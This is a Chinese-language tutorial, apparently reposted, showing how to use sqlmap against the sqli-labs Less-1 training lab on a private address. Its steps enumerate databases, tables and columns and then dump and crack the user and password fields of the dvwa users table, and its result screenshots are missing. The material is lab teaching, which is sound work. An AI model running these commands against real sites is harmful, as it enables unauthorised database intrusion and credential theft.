sqlmap基礎使用(以sqli—labs第一關為例)


一、基礎測試有哪些漏洞

命令:sqlmap.py -u "url"

語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1"

結果:

 

 

 二、爆出所有數據庫命令

命令:sqlmap.py -u "url" --dbs

語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" --dbs

結果:

 

 

 三、爆指定數據庫的表名

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱  --tables

語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa --tables

 

 

 四、爆指定表中字段

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱  -T 指定表的名稱  --columns

語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D  dvwa   -T  users  --columns

結果:

 五、爆字段內容

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱  -T 指定表的名稱  -C  user,password  --dump

語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa  -T users  -C  user,password  --dump

注:這個應該password輸出的是數字與字母混合的字符串,由於在輸入上面語句的過程中,我在這里選擇了yes,順帶着給解密了

結果:

還沒完,今日先到這~~~


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM